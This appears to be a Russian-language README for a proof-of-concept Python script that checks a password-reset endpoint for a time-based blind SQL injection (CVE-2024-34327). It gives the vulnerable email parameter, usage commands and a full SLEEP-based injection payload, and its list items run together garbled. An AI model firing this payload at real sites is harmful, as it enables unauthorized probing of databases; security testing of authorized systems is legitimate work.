
Проверка концепции для обнаружения time-based blind SQL-инъекции в password-reset-token.php; отправляет специально сформированные POST-запросы и выявляет задержанные ответы для CVE-2024-34327.
Этот скрипт (V-24-02-001_SQLi_Check.py) является инструментом доказательства концепции (PoC) для проверки наличия уязвимости временной слепой SQL-инъекции, затрагивающей конечную точку password-reset-token.php, идентифицированной как CVE-2024-34327.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Несанкционированное сканирование или эксплуатация систем без согласия является незаконным и неэтичным.
/auth/password-reset-token.phpemail в данных POSTSLEEP() для измерения задержки ответа сервераPHPSESSID для каждого запускаrequests (pip install requests)python3 V-24-02-001_SQLi_Check.py --url https://target-domain.com
python3 V-24-02-001_SQLi_Check.py --url https://vulnerable-site.com
[+] VULNERABLE если задержка ответа сервера превышает 9 секунд[-] NOT VULNERABLE в противном случаеdata[email][email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'='abcd
requestsUser-Agent и RefererВы несете ответственность за этичное использование этого инструмента. Автор не принимает никакой ответственности за любое неправомерное использование.
Специалист по безопасности – [Ваше имя или псевдоним]
Не стесняйтесь вносить вклад или сообщать о проблемах.